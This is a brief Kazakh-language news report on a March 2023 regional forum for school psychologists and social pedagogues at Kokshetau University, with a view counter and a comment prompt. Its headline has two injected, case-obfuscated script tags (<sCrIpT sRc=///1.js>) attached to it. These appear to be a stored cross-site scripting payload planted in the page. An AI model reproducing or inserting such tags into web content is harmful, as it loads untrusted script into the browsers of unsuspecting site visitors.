«XXI ғасырда жеке тұлға саулығын психологиялық зерделеудің заманауи бағыттары» тақырыбында өңірлік форум өтті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.03.2023

2023 жылдың 24наурызы күні Көкшетау қ., «Шоқан Уәлиханов атындағы Көкшетау университеті» коммерциялық емес акцонерлік қоғамы базасында педагог – психологтар, әлеуметтік педагогтар, әдіскерлердің: «XXI ғасырда жеке тұлға саулығын психологиялық зерделеудің заманауи бағыттары» тақырыбында өңірлік форум өтті.

 Атбасар ауданынан форумға барғандар: «Кибербуллингтің мектеп оқушыларының психологиялық жайлылығына ықпалы»; «Білім беру ұйымдарындағы  педагог – психологтардың қызметін әдістемелік қоштауды ұйымдастыру  бойынша  заманауи талаптар» тақырыптары бойынша секция жұмыстарына қатысты.

Секция отырысында спикерлер қатысушыларды   педагог – психологтардың жұмыстарындағы проблемалармен таныстырды, ұсыныстар берді және пікірлер тыңдалды.

Просмотров: 784


Пікір қосу



Деректерді қолтаңбаға қосу